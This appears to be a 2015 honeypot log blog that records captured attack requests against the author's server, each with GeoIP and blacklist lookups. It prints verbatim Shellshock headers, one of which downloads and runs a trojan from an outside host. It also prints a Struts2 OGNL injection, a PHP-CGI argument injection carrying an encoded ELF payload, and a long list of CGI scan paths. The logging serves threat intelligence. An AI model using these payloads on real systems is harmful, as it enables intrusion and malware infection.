Mittwoch, 30. September 2015

61.161.130.241 - ChinaZ attempt via 61.160.212.172

BEGIN OF HTTP DATA:
2015-09-30 11:05:18
Source IP: 61.161.130.241
Country: CN RiskScore: 1 Malware: []
GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
I did not thought to see that again :-)
java: Linux.Trojan.Agent FOUND

61.161.130[.]241

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.161.130.241

61.160.212[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.212.172

 

Sonntag, 27. September 2015

113.204.53.134 - com.opensymphony.xwork2.dispatcher

BEGIN OF HTTP DATA:
2015-09-26 14:05:03
Source IP: 113.204.53.134
Country: CN RiskScore: 1 Malware: []
POST /unAuthorizedAccess.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 109.234.106.8
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
To make it better viewable
redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}
 

113.204.53[.]134

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.204.53.134
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt?n=99999999999999999999

Montag, 21. September 2015

46.172.71.251 - simple bash injection

BEGIN OF HTTP DATA:
2015-09-21 20:45:43
Source IP: 46.172.71.251
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
46.172.71[.]251
    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS43110 Joint Ukrainian-American enterprise Ewropol with legal form Ltd
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

94.180.115.102 - php Buffer overflow attempt

BEGIN OF HTTP DATA:
2015-09-22 03:24:28
Source IP: 94.180.115.102
Country: RU RiskScore: 1 Malware: []
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43604
Connection: close
<?php
$bufferf = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAAEDwQAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAACAEAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAA5EMAAAAAAADkQwAAAAAAAAAAEAAAAAAAAQAAAAYAAADgmwAAAAAAAOCbUAAAAAAA4JtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAB1k/mqVVBYIeAHDRYAAAAAYJ4AAGCeAAAAAgAAsAAAAAIAAAD7+yH/f0VMRgIBAQACAD4ADdAbQA+7ZL8XBQCglyITOADdsu67CAUbABoABg8FJwdA5IQ8IcABAAgA2GCT7gNwBHhABwIyIU8cAAAB+cAG9m+NB2SJADyTbQkAEDcGkJ6dkO8HUDAFN+ALN
 The enquoted code decodes to

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n HTTP/1.1
94.180.115[.]102
    Static Source: GeoIP data
  • Country: Russian Federation
  • ASN: AS43478 CJSC ER-Telecom Holding
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/94.180.115.102
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


208.100.26.231 - fire on port 8080

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:24
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^V^C^@^@S^A^@^@O^C^@?G<D7><F7><BA>,<EE><EA><B2>`~<F3>^@<FD><82>{<B9>Ֆ<C8>w<9B><E6><C4><DB><=<DB>o<EF>^Pn^@^@(^@^V^@^S^@
^@f^@^E^@^D^@e^@d^@c^@b^@a^@`^@^U^@^R^@ ^@^T^@^Q^@^H^@^F^@^C^A^@
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:29
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@^@^@qj<81>n0<81>k<A1>^C^B^A^E<A2>^C^B^A
<A4><81>^0\<A0>^G^C^E^@P<80>^@^P<A2>^DESC^BNM<A3>^W0^U<A0>^C^B^A^@<A1>^N0^LESC^FkrbtgtESC^BNM<A5>^Q^X^O19700101000000Z<A7>^F^B^D^_^^<B9>٨^W0^U^B^A^R^B^A^Q^B^A^P^B^A^W^B^A^A^B^A^C^B^A^B
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:34
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@^@^@<A4><FF>SMBr^@^@^@^@^H^A@^@^@^@^@^@^@^@^@^@^@^@^@^@^@@^F^@^@^A^@^@<81>^@^BPC NETWORK PROGRAM 1.0^@^BMICROSOFT NETWORKS 1.03^@^BMICROSOFT NETWORKS 3.0^@^BLANMAN1.0^@^BLM1.2X002^@^BSamba^@^BNT LANMAN 1.0^@^BNT LM 0.12^@
 END OF DATA
BEGIN OF TOMCAT DATA:
2015-09-22 00:34:26
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
:^@^@^@/^@^@^@^B^@^@@^B^O^@^A^@=^E^@^@^@^@^@^@^@^@^@^@^@^@/^@^@^@^@^@^@^@^@^@@^_^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:34:31
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^A^@^@<FD><CE><FA>^K<B0><A0>^@^@^@MMS^T^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^R^@^@^@^A^@^C^@<F0><F0><F0><F0>^K^@^D^@^\^@^C^@N^@S^@P^@
l^@a^@y^@e^@r^@/^@9^@.^@0^@.^@0^@.^@2^@9^@8^@0^@;^@ ^@{^@0^@0^@0^@0^@A^@A^@0^@0^@-^@0^@A^@0^@0^@-^@0^@0^@a^@0^@-^@A^@A^@0^@A^@
-^@0^@0^@0^@0^@A^@0^@A^@A^@0^@A^@A^@0^@}^@^@^@<E0>m<DF>_
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:34:37
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@Z^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@ ^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(CONNECT_DAT
A=(COMMAND=version))
 END OF DATA
 
Although I am not able to read the exact try, there have been several different events.

208.100.26[.]231
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


Sonntag, 20. September 2015

50.118.172.34 / 195.169.125.87 - HTTP javascript/html submission

BEGIN OF HTTP DATA:
2015-09-20 23:58:45
Source IP: 50.118.172.34
Country: US RiskScore: 1 Malware: []
GET /administrator/index.php HTTP/1.1
Host: 195.169.125.87
Accept-Language: en,en-us;q=0.7,es;q=0.3
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Connection: close
Content-Type: text/html
Content-Length: 2221
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: utf-8;q=0.7,*;q=0.7

<html><body><script type="text/javascript">ANCHORFREE_VERSION="413161526"</script><script type='text/javascript'>(function(){if(typeof(_AF2$runned)!='undefined'&&_AF2$runned==true){return}_AF2$={'SN':'HSSHIELD00ZZ','IP':'205.164.32.102','CH':'HSSCNL100714','CT':'0','HST':'&isUpdated=0','AFH':'hss498','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'4.18.2','FBW':'','FBWCNT':0};if(/^(.*,)?(11C)(,.*)?$/g.exec(_AF2$.CT)!=null){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/par.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}document.write("<style type='text/css' title='AFc_css"+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{} .AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+":visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>");})();</script><style type='text/css'>.AFhss_dpnone{display:none;width:0;height:0}</style><img src="about:blank"id="AFhss_trk"name="AFhss_trk"style="display:none"/><div id="AFhss_dfs"class="AFhss_dpnone"><div id="AFhss_adrp0"class="AFhss_dpnone"></div><div id="AFhss_adrp1"class="AFhss_dpnone"></div><div id="AFhss_adrp2"class="AFhss_dpnone"></div><div id="AFhss_adrp3"class="AFhss_dpnone"></div><div id="AFhss_adrp4"class="AFhss_dpnone"></div><div id="AFhss_adrp5"class="AFhss_dpnone"></div><div id="AFhss_adrp6"class="AFhss_dpnone"></div><div id="AFhss_adrp7"class="AFhss_dpnone"></div><div id="AFhss_adrp8"class="AFhss_dpnone"></div><div id="AFhss_adrp9"class="AFhss_dpnone"></div></div><script type='text/javascript'>(function(){if(typeof(_AF2$runned)!='undefined'&&_AF2$runned==true){return}_AF2$={'SN':'HSSHIELD00ZZ','IP':'205.164.32.102','CH':'HSSCNL100714','CT':'0','HST':'&isUpdated=0','AFH':'hss498','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'4.18.2','FBW':'','FBWCNT':0};if(_AF2$.TOP==1){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/41.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}})()</script>Hello World</body></html>
50.118.172[.]34
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS21321 Areti Internet Ltd.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/50.118.172.34

195.169.125[.]87
    Static Source: GeoIP data
  • Country: Netherlands
  • ASN: AS1103 SURFnet, The Netherlands
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.169.125.87

205.164.32[.]102
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS21321 Areti Internet Ltd.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/205.164.32.102

Montag, 14. September 2015

195.141.90.114 - M'expr 1330 +7 and 1344 - 7

BEGIN OF HTTP DATA:
2015-09-14 23:55:34
Source IP: 195.141.90.114
Country: CH RiskScore: 1 Malware: []
GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @ HTTP/1.0
Host: oc.johest.de
Cookie: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
User-Agent: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Referer: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Although I find it a bit funny to find 1337 in my logs, I believe it should not be there :-)

195.141.90[.]114
    Static Source: GeoIP data
  • Country: Switzerland
  • ASN: AS6730 Sunrise Communications AG
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.141.90.114
The following requests have been seen in this kind of attack.

GET / HTTP/1.0
GET /admin.cgi HTTP/1.0
GET /administrator.cgi HTTP/1.0
GET /agora.cgi HTTP/1.0
GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0
GET /analyse.cgi HTTP/1.0
GET /apps/web/vs_diag.cgi HTTP/1.0
GET /axis-cgi/buffer/command.cgi HTTP/1.0
GET /b2-include/b2edit.showposts.php HTTP/1.0
GET /bandwidth/index.cgi HTTP/1.0
GET /bigconf.cgi HTTP/1.0
GET /cartcart.cgi HTTP/1.0
GET /cart.cgi HTTP/1.0
GET /catalog/index.cgi HTTP/1.0
GET /ccbill/whereami.cgi HTTP/1.0
GET /cgi-bin/ HTTP/1.0
GET /cgi-bin/14all-1.1.cgi HTTP/1.0
GET /cgi-bin/14all.cgi HTTP/1.0
GET /cgi-bin/%2f/admin.html HTTP/1.0
GET /cgi-bin/a1disp3.cgi HTTP/1.0
GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0
GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0
GET /cgi-bin/addbanner.cgi HTTP/1.0
GET /cgi-bin/add_ftp.cgi HTTP/1.0
GET /cgi-bin/adduser.cgi HTTP/1.0
GET /cgi-bin/admin/admin.cgi HTTP/1.0
GET /cgi-bin/admin.cgi HTTP/1.0
GET /cgi-bin/adminhot.cgi HTTP/1.0
GET /cgi-bin/admin.html HTTP/1.0
GET /cgi-bin/admin.pl HTTP/1.0
GET /cgi-bin/admin/setup.cgi HTTP/1.0
GET /cgi-bin/adminwww.cgi HTTP/1.0
GET /cgi-bin/af.cgi HTTP/1.0
GET /cgi-bin/aglimpse.cgi HTTP/1.0
GET /cgi-bin/alienform.cgi HTTP/1.0
GET /cgi-bin/AnyBoard.cgi HTTP/1.0
GET /cgi-bin/architext_query.cgi HTTP/1.0
GET /cgi-bin/astrocam.cgi HTTP/1.0
GET /cgi-bin/AT-admin.cgi HTTP/1.0
GET /cgi-bin/AT-generate.cgi HTTP/1.0
GET /cgi-bin/auction/auction.cgi HTTP/1.0
GET /cgi-bin/auktion.cgi HTTP/1.0
GET /cgi-bin/authLogin.cgi HTTP/1.0
GET /cgi-bin/ax-admin.cgi HTTP/1.0
GET /cgi-bin/ax.cgi HTTP/1.0
GET /cgi-bin/axs.cgi HTTP/1.0
GET /cgi-bin/badmin.cgi HTTP/1.0
GET /cgi-bin/banner.cgi HTTP/1.0
GET /cgi-bin/bannereditor.cgi HTTP/1.0
GET /cgi-bin/bash HTTP/1.0
GET /cgi-bin/bb-ack.sh HTTP/1.0
GET /cgi-bin/bb-histlog.sh HTTP/1.0
GET /cgi-bin/bb-hist.sh HTTP/1.0
GET /cgi-bin/bb-hostsvc.sh HTTP/1.0
GET /cgi-bin/bb-replog.sh HTTP/1.0
GET /cgi-bin/bb-rep.sh HTTP/1.0
GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0
GET /cgi-bin/bbs_forum.cgi HTTP/1.0
GET /cgi-bin/bigconf.cgi HTTP/1.0
GET /cgi-bin/bizdb1-search.cgi HTTP/1.0
GET /cgi-bin/blog/mt-check.cgi HTTP/1.0
GET /cgi-bin/blog/mt-load.cgi HTTP/1.0
GET /cgi-bin/bnbform.cgi HTTP/1.0
GET /cgi-bin/book.cgi HTTP/1.0
GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0
GET /cgi-bin/bsguest.cgi HTTP/1.0
GET /cgi-bin/bslist.cgi HTTP/1.0
GET /cgi-bin/build.cgi HTTP/1.0
GET /cgi-bin/bulk/bulk.cgi HTTP/1.0
GET /cgi-bin/cached_feed.cgi HTTP/1.0
GET /cgi-bin/cachemgr.cgi HTTP/1.0
GET /cgi-bin/calendar/index.cgi HTTP/1.0
GET /cgi-bin/cartmanager.cgi HTTP/1.0
GET /cgi-bin/cbmc/forums.cgi HTTP/1.0
GET /cgi-bin/ccvsblame.cgi HTTP/1.0
GET /cgi-bin/c_download.cgi HTTP/1.0
GET /cgi-bin/cgforum.cgi HTTP/1.0
GET /cgi-bin/cgi.cgi HTTP/1.0
GET /cgi-bin/cgi_process HTTP/1.0
GET /cgi-bin/classified.cgi HTTP/1.0
GET /cgi-bin/classifieds.cgi HTTP/1.0
GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0
GET /cgi-bin/classifieds/index.cgi HTTP/1.0
GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0
GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0
GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0
GET /cgi-bin/commandit.cgi HTTP/1.0
GET /cgi-bin/commerce.cgi HTTP/1.0
GET /cgi-bin/common/listrec.pl HTTP/1.0
GET /cgi-bin/compatible.cgi HTTP/1.0
GET /cgi-bin/contact.cgi HTTP/1.0
GET /cgi-bin/Count.cgi HTTP/1.0
GET /cgi-bin/csChatRBox.cgi HTTP/1.0
GET /cgi-bin/csGuestBook.cgi HTTP/1.0
GET /cgi-bin/csLiveSupport.cgi HTTP/1.0
GET /cgi-bin/CSMailto.cgi HTTP/1.0
GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0
GET /cgi-bin/csNews.cgi HTTP/1.0
GET /cgi-bin/csNewsPro.cgi HTTP/1.0
GET /cgi-bin/csPassword.cgi HTTP/1.0
GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0
GET /cgi-bin/csSearch.cgi HTTP/1.0
GET /cgi-bin/csv_db.cgi HTTP/1.0
GET /cgi-bin/cvsblame.cgi HTTP/1.0
GET /cgi-bin/cvslog.cgi HTTP/1.0
GET /cgi-bin/cvsquery.cgi HTTP/1.0
GET /cgi-bin/cvsqueryform.cgi HTTP/1.0
GET /cgi-bin/day5datacopier.cgi HTTP/1.0
GET /cgi-bin/day5datanotifier.cgi HTTP/1.0
GET /cgi-bin/db_manager.cgi HTTP/1.0
GET /cgi-bin/dbman/db.cgi HTTP/1.0
GET /cgi-bin/dcforum.cgi HTTP/1.0
GET /cgi-bin/defaultwebpage.cgi HTTP/1.0
GET /cgi-bin/dfire.cgi HTTP/1.0
GET /cgi-bin/diagnose.cgi HTTP/1.0
GET /cgi-bin/dig.cgi HTTP/1.0
GET /cgi-bin/directorypro.cgi HTTP/1.0
GET /cgi-bin/download.cgi HTTP/1.0
GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0
GET /cgi-bin/emumail.cgi HTTP/1.0
GET /cgi-bin/emumail/emumail.cgi HTTP/1.0
GET /cgi-bin/enter.cgi HTTP/1.0
GET /cgi-bin/env.cgi HTTP/1.0
GET /cgi-bin/environ.cgi HTTP/1.0
GET /cgi-bin/ezadmin.cgi HTTP/1.0
GET /cgi-bin/ezboard.cgi HTTP/1.0
GET /cgi-bin/ezman.cgi HTTP/1.0
GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper/search.cgi HTTP/1.0
GET /cgi-bin/faqmanager.cgi HTTP/1.0
GET /cgi-bin/FileSeek2.cgi HTTP/1.0
GET /cgi-bin/FileSeek.cgi HTTP/1.0
GET /cgi-bin/finger.cgi HTTP/1.0
GET /cgi-bin/firmwarecfg HTTP/1.0
GET /cgi-bin/flexform.cgi HTTP/1.0
GET /cgi-bin/fom.cgi HTTP/1.0
GET /cgi-bin/fom/fom.cgi HTTP/1.0
GET /cgi-bin/FormHandler.cgi HTTP/1.0
GET /cgi-bin/FormMail.cgi HTTP/1.0
GET /cgi-bin/forum.cgi HTTP/1.0
GET /cgi-bin/gbadmin.cgi HTTP/1.0
GET /cgi-bin/gbook/gbook.cgi HTTP/1.0
GET /cgi-bin/generate.cgi HTTP/1.0
GET /cgi-bin/getdoc.cgi HTTP/1.0
GET /cgi-bin/gH.cgi HTTP/1.0
GET /cgi-bin/gm-authors.cgi HTTP/1.0
GET /cgi-bin/gm.cgi HTTP/1.0
GET /cgi-bin/gm-cplog.cgi HTTP/1.0
GET /cgi-bin/guestbook.cgi HTTP/1.0
GET /cgi-bin/handler HTTP/1.0
GET /cgi-bin/handler.cgi HTTP/1.0
GET /cgi-bin/handler/netsonar HTTP/1.0
GET /cgi-bin/hello HTTP/1.0
GET /cgi-bin/hello.cgi HTTP/1.0
GET /cgi-bin/helpme HTTP/1.0
GET /cgi-bin/hitview.cgi HTTP/1.0
GET /cgi-bin/hsx.cgi HTTP/1.0
GET /cgi-bin/html2chtml.cgi HTTP/1.0
GET /cgi-bin/html2wml.cgi HTTP/1.0
GET /cgi-bin/htsearch.cgi HTTP/1.0
GET /cgi-bin/icat HTTP/1.0
GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0
GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0
GET /cgi-bin/ikonboard/help.cgi HTTP/1.0
GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0
GET /cgi-bin/imageFolio.cgi HTTP/1.0
GET /cgi-bin/index.cgi HTTP/1.0
GET /cgi-bin/info.sh HTTP/1.0
GET /cgi-bin/infosrch.cgi HTTP/1.0
GET /cgi-bin/jammail.pl HTTP/1.0
GET /cgi-bin/journal.cgi HTTP/1.0
GET /cgi-bin/lastlines.cgi HTTP/1.0
GET /cgi-bin/loadpage.cgi HTTP/1.0
GET /cgi-bin/login.cgi HTTP/1.0
GET /cgi-bin/logit.cgi HTTP/1.0
GET /cgi-bin/log-reader.cgi HTTP/1.0
GET /cgi-bin/lookwho.cgi HTTP/1.0
GET /cgi-bin/lwgate.cgi HTTP/1.0
GET /cgi-bin/MachineInfo HTTP/1.0
GET /cgi-bin/magiccard.cgi HTTP/1.0
GET /cgi-bin/mail/emumail.cgi HTTP/1.0
GET /cgi-bin/maillist.cgi HTTP/1.0
GET /cgi-bin/mailnews.cgi HTTP/1.0
GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0
GET /cgi-bin/main.cgi HTTP/1.0
GET /cgi-bin/main_menu.pl HTTP/1.0
GET /cgi-bin/man.sh HTTP/1.0
GET /cgi-bin/meme.cgi HTTP/1.0
GET /cgi-bin/mini_logger.cgi HTTP/1.0
GET /cgi-bin/mmstdod.cgi HTTP/1.0
GET /cgi-bin/moin.cgi HTTP/1.0
GET /cgi-bin/mojo/mojo.cgi HTTP/1.0
GET /cgi-bin/mrtg.cgi HTTP/1.0
GET /cgi-bin/mt/mt-check.cgi HTTP/1.0
GET /cgi-bin/mt/mt-load.cgi HTTP/1.0
GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0
GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0
GET /cgi-bin/musicqueue.cgi HTTP/1.0
GET /cgi-bin/myguestbook.cgi HTTP/1.0
GET /cgi-bin/.namazu.cgi HTTP/1.0
GET /cgi-bin/netauth.cgi HTTP/1.0
GET /cgi-bin/netpad.cgi HTTP/1.0
GET /cgi-bin/newsdesk.cgi HTTP/1.0
GET /cgi-bin/nlog-smb.cgi HTTP/1.0
GET /cgi-bin/nph-emumail.cgi HTTP/1.0
GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0
GET /cgi-bin/nph-publish.cgi HTTP/1.0
GET /cgi-bin/nph-test.cgi HTTP/1.0
GET /cgi-bin/pagelog.cgi HTTP/1.0
GET /cgi-bin/pbcgi.cgi HTTP/1.0
GET /cgi-bin/perlshop.cgi HTTP/1.0
GET /cgi-bin/pfdispaly.cgi HTTP/1.0
GET /cgi-bin/pfdisplay.cgi HTTP/1.0
GET /cgi-bin/phf.cgi HTTP/1.0
GET /cgi-bin/photo/manage.cgi HTTP/1.0
GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0
GET /cgi-bin/php HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php4 HTTP/1.0
GET /cgi-bin/php4.cgi HTTP/1.0
GET /cgi-bin/php5.cgi HTTP/1.0
GET /cgi-bin/php5 HTTP/1.0
GET /cgi-bin/php5? HTTP/1.0
GET /cgi-bin/php5-cgi HTTP/1.0
GET /cgi-bin/php5-cli? HTTP/1.0
GET /cgi-bin/php-cgi HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php-cgi.bin HTTP/1.0
GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0
GET /cgi-bin/pollssi.cgi HTTP/1.0
GET /cgi-bin/postcards.cgi HTTP/1.0
GET /cgi-bin/powerup/r.cgi HTTP/1.0
GET /cgi-bin/printenv HTTP/1.0
GET /cgi-bin/probecontrol.cgi HTTP/1.0
GET /cgi-bin/profile.cgi HTTP/1.0
GET /cgi-bin/publisher/search.cgi HTTP/1.0
GET /cgi-bin/quickstore.cgi HTTP/1.0
GET /cgi-bin/quizme.cgi HTTP/1.0
GET /cgi-bin/ratlog.cgi HTTP/1.0
GET /cgi-bin/r.cgi HTTP/1.0
GET /cgi-bin/recent.cgi HTTP/1.0
GET /cgi-bin/register.cgi HTTP/1.0
GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0
GET /cgi-bin/responder.cgi HTTP/1.0
GET /cgi-bin/robadmin.cgi HTTP/1.0
GET /cgi-bin/robpoll.cgi HTTP/1.0
